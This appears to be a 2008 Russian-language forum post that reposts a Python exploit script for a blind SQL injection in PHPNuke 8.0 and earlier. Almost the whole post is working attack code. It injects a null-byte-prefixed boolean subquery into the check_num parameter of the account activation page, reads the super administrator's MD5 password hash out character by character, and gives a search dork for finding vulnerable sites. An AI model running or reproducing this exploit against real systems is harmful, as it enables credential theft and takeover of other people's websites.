14.07.2008, 06:12
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350
Репутация:
412
|
|
PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerab
Код:
#!/usr/bin/python
#===============================================================================
==================#
# This is a Priv8 Exploit. #
# Date: 23/02/2008 [dd,mm,yyyy] #
# #
#===============================================================================
==================#
# PHPNuke <= 8.0 And maybe Higher Blind Sql Injection Vulnerability #2 #
# Response Analisys Method #
# #
# Vendor: http://www.phpnuke.org #
# Severity: Highest #
# Author: The:Paradox #
#===============================================================================
==================#
# Server configuration requirments: #
# magic_quotes_gpc = 0 #
#===============================================================================
==================#
# Proud To Be Italian. #
#===============================================================================
==================#
"""
Related Codes:
mainfile.php; line 89;
if (!ini_get('register_globals')) {
@import_request_variables("GPC", "");
}
/Your_Account/index.php; line 1700;
switch($op) {
// [..]
case "activate":
activate($username, $check_num);
break;
// [..]
}
/Your_Account/index.php; line 161:
function activate($username, $check_num) {
global $db, $user_prefix, $module_name, $language, $prefix;
$username = filter($username, "nohtml", 1);
$past = time()-86400;
$db->sql_query("DELETE FROM ".$user_prefix."_users_temp WHERE time < $past");
$sql = "SELECT * FROM ".$user_prefix."_users_temp WHERE username='$username' AND check_num='$check_num'";
echo $sql;
$result = $db->sql_query($sql);
"""
#===============================================================================
==================#
# Proof Of Concept / Bug Explanation: #
# #
# I'm too lazy to write explanation this time. Sql injection Mq=OFF in $check_num variable. #
# Byte null bypasses all query string check. #
# #
#===============================================================================
==================#
# Google Dork=> Powered by PHPNuke #
#===============================================================================
==================#
# Use this at your own risk. You are responsible for your own deeds. #
#===============================================================================
==================#
# Python Exploit Starts #
#===============================================================================
==================#
import httplib, sys, time
print "\n#=========================================================#"
print " PHPNuke <= 8.0 And Maybe Higher "
print " Blind Sql Injection Vulnerability Mq=0 "
print " Response Analisys Method "
print " "
print " Discovered By The:Paradox "
print " "
print " Usage: "
print " python %s [Target] [Path] [UsernameUnveryfied] " % (sys.argv[0])
print " "
print " Example: "
print " python %s 127.0.0.1 /Nuke/ Abdullah " % (sys.argv[0])
print " python %s www.host.com / Andrea " % (sys.argv[0])
print " "
print " "
print "#=========================================================#\n"
if len(sys.argv)<=3: sys.exit()
else: print "[.]Exploit Starting."
target = sys.argv[1]
path = sys.argv[2]
prefix = "nuke_"
port = "80"
j=1
h4sh = ""
md5tuple = []
for k in range(48,58): md5tuple.append(k) # 48->57 and 97->102
for k in range(97,103): md5tuple.append(k)
md5tuple.append('END')
# Result query >>>
#
# SELECT * FROM nuke_users_temp WHERE username='Nick' AND check_num='1%00' OR (SELECT IF((ASCII(SUBSTRING(pwd,1,1))=99),1,null) FROM nuke_authors WHERE radminsuper=1)='1'
#
print "[.]Blind Sql Injection Starts.\n\nHash:"
while j <= 32:
for i in md5tuple:
if i == 'END': sys.exit('[-]Exploit Failed.\n')
conn = httplib.HTTPConnection(target,port)
conn.request('GET', path + "modules.php?name=Your_Account&op=activate&username=" + sys.argv[3] + "&check_num=1%00'+OR+(SELECT+IF((ASCII(SUBSTRING(pwd," + str(j) + ",1))=" + str(i) + "),1,null)+FROM+" + prefix + "authors+WHERE+radminsuper=1)='1", {}, {"Accept": "text/plain", "lang":"english"})
response = conn.getresponse()
time.sleep(0.5)
if response.status == 404: sys.exit('[-]Error 404. Not Found.')
if response.read().find("New user verification number is invalid.") != -1:
sys.stdout.write(chr(i))
sys.stdout.flush()
h4sh += chr(i)
j += 1
break;
print "\n\n[+]All Done.\n-=Paradoxe=-"
|
|
|